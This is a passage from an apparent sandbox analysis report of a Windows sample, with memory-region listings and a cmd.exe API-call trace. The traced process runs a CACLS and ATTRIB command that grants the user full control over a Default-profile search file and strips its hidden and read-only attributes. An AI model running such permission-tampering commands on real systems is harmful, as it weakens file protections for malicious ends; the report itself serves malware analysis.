end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32374 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32375 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32376 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32377 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 32378 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32379 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 757 os_tid = 0x6d8 Process: id = "555" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d40" os_pid = "0xa0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32392 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32393 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32394 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32395 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 32396 start_va = 0x49f60000 end_va = 0x49fabfff entry_point = 0x49f60000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32397 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32398 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32399 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32400 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 32401 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32402 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32403 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32404 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32405 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 32406 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 32407 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32408 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32409 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32410 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32411 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32412 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32413 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32414 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32415 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32416 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32417 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32418 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32419 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 32420 start_va = 0x3a0000 end_va = 0x3a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 32421 start_va = 0x4c0000 end_va = 0x10bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 32422 start_va = 0x10c0000 end_va = 0x10c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 32423 start_va = 0x10d0000 end_va = 0x1232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 32424 start_va = 0x1240000 end_va = 0x1240fff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 32425 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 32426 start_va = 0x1260000 end_va = 0x152efff entry_point = 0x1260000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 758 os_tid = 0xcf8 [0217.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f984 | out: lpSystemTimeAsFileTime=0x28f984*(dwLowDateTime=0xb64f0e40, dwHighDateTime=0x1d440a9)) [0217.279] GetCurrentProcessId () returned 0xa0c [0217.279] GetCurrentThreadId () returned 0xcf8 [0217.279] GetTickCount () returned 0x3cc05 [0217.279] QueryPerformanceCounter (in: lpPerformanceCount=0x28f97c | out: lpPerformanceCount=0x28f97c*=27406781726) returned 1 [0217.279] GetModuleHandleA (lpModuleName=0x0) returned 0x49f60000 [0217.279] __set_app_type (_Type=0x1) [0217.279] __p__fmode () returned 0x76b331f4 [0217.279] __p__commode () returned 0x76b331fc [0217.279] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f821a6) returned 0x0 [0217.279] __getmainargs (in: _Argc=0x49f84238, _Argv=0x49f84240, _Env=0x49f8423c, _DoWildCard=0, _StartInfo=0x49f84140 | out: _Argc=0x49f84238, _Argv=0x49f84240, _Env=0x49f8423c) returned 0 [0217.280] GetCurrentThreadId () returned 0xcf8 [0217.280] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcf8) returned 0x38 [0217.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.280] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0217.280] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.280] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f914 | out: phkResult=0x28f914*=0x0) returned 0x2 [0217.280] VirtualQuery (in: lpAddress=0x28f94b, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.280] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0217.280] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0217.280] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.280] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f8e4, dwLength=0x1c | out: lpBuffer=0x28f8e4*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0217.280] GetConsoleOutputCP () returned 0x1b5 [0217.280] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f84260 | out: lpCPInfo=0x49f84260) returned 1 [0217.280] SetConsoleCtrlHandler (HandlerRoutine=0x49f7e72a, Add=1) returned 1 [0217.280] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0217.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f841ac | out: lpMode=0x49f841ac) returned 1 [0217.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.281] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f841b0 | out: lpMode=0x49f841b0) returned 1 [0217.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.281] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0217.281] GetEnvironmentStringsW () returned 0x3d0228* [0217.281] FreeEnvironmentStringsW (penv=0x3d0228) returned 1 [0217.282] GetEnvironmentStringsW () returned 0x3d0228* [0217.282] FreeEnvironmentStringsW (penv=0x3d0228) returned 1 [0217.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e884 | out: phkResult=0x28e884*=0x40) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0xb8, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x1, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x1, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x0, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x40, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x40, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x40, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegCloseKey (hKey=0x40) returned 0x0 [0217.282] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e884 | out: phkResult=0x28e884*=0x40) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x40, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x1, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x1, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x0, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x9, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x4, lpData=0x28e890*=0x9, lpcbData=0x28e888*=0x4) returned 0x0 [0217.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e88c, lpData=0x28e890, lpcbData=0x28e888*=0x1000 | out: lpType=0x28e88c*=0x0, lpData=0x28e890*=0x9, lpcbData=0x28e888*=0x1000) returned 0x2 [0217.282] RegCloseKey (hKey=0x40) returned 0x0 [0217.282] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b3 [0217.282] srand (_Seed=0x5b8863b3) [0217.282] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"" [0217.282] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"" [0217.283] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f85260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.283] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1988, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0217.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.283] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.283] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0217.283] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0217.283] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0217.283] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0217.283] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0217.283] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0217.283] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0217.283] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0217.283] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0217.283] GetEnvironmentStringsW () returned 0x3d2378* [0217.284] FreeEnvironmentStringsW (penv=0x3d2378) returned 1 [0217.284] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.284] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.284] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0217.284] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0217.284] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0217.284] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0217.284] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0217.284] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0217.284] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0217.284] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0217.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f650 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.284] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f650, lpFilePart=0x28f64c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f64c*="Desktop") returned 0x18 [0217.284] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.284] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f3cc | out: lpFindFileData=0x28f3cc) returned 0x3d0a08 [0217.284] FindClose (in: hFindFile=0x3d0a08 | out: hFindFile=0x3d0a08) returned 1 [0217.284] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f3cc | out: lpFindFileData=0x28f3cc) returned 0x3d0a08 [0217.284] FindClose (in: hFindFile=0x3d0a08 | out: hFindFile=0x3d0a08) returned 1 [0217.284] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f3cc | out: lpFindFileData=0x28f3cc) returned 0x3d0a08 [0217.285] FindClose (in: hFindFile=0x3d0a08 | out: hFindFile=0x3d0a08) returned 1 [0217.285] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.285] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0217.285] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0217.285] GetEnvironmentStringsW () returned 0x3d0228* [0217.285] FreeEnvironmentStringsW (penv=0x3d0228) returned 1 [0217.285] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f85260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.285] GetConsoleOutputCP () returned 0x1b5 [0217.285] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f84260 | out: lpCPInfo=0x49f84260) returned 1 [0217.285] GetUserDefaultLCID () returned 0x409 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f84950, cchData=8 | out: lpLCData=":") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f790, cchData=128 | out: lpLCData="0") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f790, cchData=128 | out: lpLCData="0") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f790, cchData=128 | out: lpLCData="1") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f84940, cchData=8 | out: lpLCData="/") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f84d80, cchData=32 | out: lpLCData="Mon") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f84d40, cchData=32 | out: lpLCData="Tue") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f84d00, cchData=32 | out: lpLCData="Wed") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f84cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f84c80, cchData=32 | out: lpLCData="Fri") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f84c40, cchData=32 | out: lpLCData="Sat") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f84c00, cchData=32 | out: lpLCData="Sun") returned 4 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f84930, cchData=8 | out: lpLCData=".") returned 2 [0217.286] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f84920, cchData=8 | out: lpLCData=",") returned 2 [0217.286] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0217.287] GetConsoleTitleW (in: lpConsoleTitle=0x3c0940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.287] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.287] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0217.287] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0217.287] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0217.288] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0217.288] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0217.289] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0217.289] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0217.289] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0217.289] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0217.289] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0217.289] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0217.291] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0217.291] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0217.291] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0217.291] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0217.291] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0217.291] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0217.291] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0217.292] GetConsoleTitleW (in: lpConsoleTitle=0x28f424, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.293] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0217.293] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0217.293] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0217.293] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0217.293] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0217.293] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0217.293] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0217.293] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0217.293] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0217.293] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0217.293] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0217.293] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0217.293] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0217.293] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0217.293] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0217.293] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0217.293] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0217.293] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0217.293] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0217.293] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0217.293] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0217.293] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0217.293] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0217.293] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0217.293] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned 